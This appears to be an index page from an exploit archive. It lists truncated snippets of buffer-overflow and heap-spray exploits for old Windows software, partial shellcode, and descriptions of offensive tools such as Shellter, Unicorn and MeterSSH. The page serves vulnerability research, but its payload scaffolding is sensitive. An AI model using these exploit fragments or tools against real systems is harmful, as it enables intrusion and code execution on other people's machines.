Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft

CVE-2017-11882 Exploit CVE-2017-11882 Exploit accepts over 17...

Spear Phishing Techniques Used in Attacks Targeting the Mongolian Government

Introduction FireEye recently observed a sophisticated campaign targeting individuals within the Mongolian government. Targeted individuals that enabled macros in a malicious Microsoft Word document may have been infected with Poison Ivy, a popular remote access tool RAT that has been used for...

ps-inject - Inject Shellcode on Linux PID

Inject shellcode on linux PID How use: $ make gcc -Wall -Wextra -O3 -c -o lib/file.o src/file.c gcc -Wall -Wextra -O3 -c -o lib/str.o src/str.c gcc -Wall -Wextra -O3 -c -o lib/mem.o src/mem.c gcc -Wall -Wextra -O3 -c -o lib/inject.o src/inject.c gcc -Wall -Wextra -O3 -c -o lib/main.o src/main.c g...

Dynamic Shellcode Injection: Shellter

Shellter is a dynamic shellcode injection tool, and probably the first dynamic PE infector ever created. It can be used in order to inject shellcode into native Windows applications currently 32-bit apps only. The shellcode can be something yours or something generated through a framework, such a...

Mini-stream-RM-MP3-Converter-3.1.2.2

Author : SkY-NeT SySteMs Software Link : http://mini-stream.net/rm-to-mp3-converter/download/ Version : 3.1.2.2 Tested on : Xp Sp 2 import os,sys header= "http://." junk= "\x41" 17416 A ESP = "\x13\x44\x87\x7C" 7C874413 FFE4 JMP ESP NOPS = "\x90" 16 ShellCode =...

Adrenalin-Player-2.2.5.3-(.asx)-

Title: Adrenalin Player .asx - SEH Buffer Overflow software: Adrenalin Player version : 2.2.5.3 Platform: Windows XP sp3 Date: June 18th, 2013 header=" " junk= "\x90" 2079 junk+="\xeb\x06\x90\x90" jmp short junk+="\x13\xf3\x16\x10" POP POP RETN AdrenalinX.dll junk+="\x90" 16 NOP padding before...

haneWIN-DNS-Server-1.5.3

Description: A SEH overflow occurs when large amount of data is sent to the server Author: Dario Estrada dash https://intrusionlabs.org Date: 2014-01-29 Version: haneWIN DNS Server 1.5.3 Vendor Homepage: http://www.hanewin.net/ Vulnerable app link:http://www.hanewin.net/dns-e.htm import socket,...

MeterSSH - Meterpreter over SSH

As penetration testers, it’s crucial to identify what types of attacks are detected and what’s not. After running into a recent penetration test with a next generation firewall, most analysis has shifted away from the endpoints and more towards network analysis. While there needs to be a mixture ...

Unicorn - Tool for using a PowerShell downgrade attack and inject shellcode straight into memory

Magic Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy TrustedSec and Josh Kelly at Defcon 18. Usage is simple, just run Magic...

CVE-2 0 1 2-0 4 9 7 exploit study notes-vulnerability warning-the black bar safety net

Previous article learn how to use the ClassName or the title to be a placeholder, now learn how to exploit the vulnerability For UAF exploits, the most simple is by Heap Spary to achieve, abroad I also made a Heap Spary directly construct an object to use the method Now learn about the two method...

Shellter - A Dynamic ShellCode Injector

Shellter is a dynamic shellcode injection tool, and probably the first dynamic PE infector ever created. It can be used in order to inject shellcode into native Windows applications currently 32-bit apps only. The shellcode can be something yours or something generated through a framework, such a...

Magneto ICMP ActiveX 4.0.0.20 Code Execution

Magneto ICMP ActiveX v4.0.0.20 ICMPSendEchoRequest Remote Code Execute Date: 2011-5-27 Discovered by: boahat vendor: http://www.magnetosoft.com/ Download: http://www.magnetosoft.com/downloads/skicmpsetup.exe SKIcmp.ocx Function ICMPSendEchoRequest ByVal bstrDestinationAddress As String As Long...

Mini-Stream RM-MP3 Converter v3.1.2.1 (.pls) Stack Buffer Overflow

Exploit for windows platform in category local exploits ============================================================================ Mini-Stream RM-MP3 Converter v3.1.2.1 .pls Stack Buffer Overflow universal ============================================================================ Mini-Stream...

UPX Compressed PE Executable Files (CVE-2005-2920)

ClamAV AntiVirus is an open source product that provides anti-virus scanning utilities and an anti-virus library. The product is capable of decoding several archive formats in order to scan their internal items for viruses. One of such archive formats is the UPX Ultimate Packer for eXecutables fi...

HTMLDOC 1.9.x-r1629 (Windows x86) - '.html' Local Buffer Overflow

/HTMLDOC 1.9.x-r1629 local .html buffer overflowwin32 exploit download: http://www.htmldoc.org/software.php?VERSION=1.9.x-r1629&FILE=htmldoc/snapshots/htmldoc-1.9.x-r1629.tar.bz2 header 19 bytes junk 268 bytes EIP register 4 bytes NOP SLEED 15 bytes calc.exe shellcode 338 bytes PLEASE READ: 1.Run...

iphone-dos.txt

function Demo var shellcode; var addr; var fill; alert'attempting a crash!'; shellcode = unescape'%u0c0c'; fill = unescape'%ucccc'; addr = 0x02020202; var b = fill; while b.length...

globallink-overflow.txt

document.write""; var heapSprayToAddress = 0x0c0c0c0c; var shellcode = unescape "%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" + // exec calc "%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%uf513" + "%ue2ce%u8369%ufceb%uf4e2%u2609%u69a6%ucef5%u2c69" +...

Microsoft Visual Basic 6.0 Project - Description Stack Overflow (PoC)

!/usr/local/bin/perl Discovered By UmZ Umair Manzoor comments are welcome at umz32.dllatgmail.com Dated 23-02-2007 Time : 02:00 AM PST Stack Overflow Buffer Size 1037690 overflow offset 004A2E43 EBX contain values Memory to write 03B50188 Visual Basic Project Description Stack overflow Affected...

Oracle 10g (PROCESS_DUP_HANDLE) Local Privilege Elevation (win32)

Exploit for unknown platform in category local exploits ================================================================= Oracle 10g PROCESSDUPHANDLE Local Privilege Elevation win32 ================================================================= // Argeniss - Information Security // // Oracle...

xtokkaetama 1.0b Local Game Exploit (Red Hat 9.0)

No description provided by source. / xtokkaetama 1.0b local game exploit on Red Hat 9.0 Coded by brahma 31/07/2003 http://www.debian.org/security/2003/dsa-356 / include stdlib.h define RETADDR 0xbfffff11 define DEFAULTBUFFERSIZE 29 define DEFAULTEGGSIZE 512 define NOP 0x90 define BIN...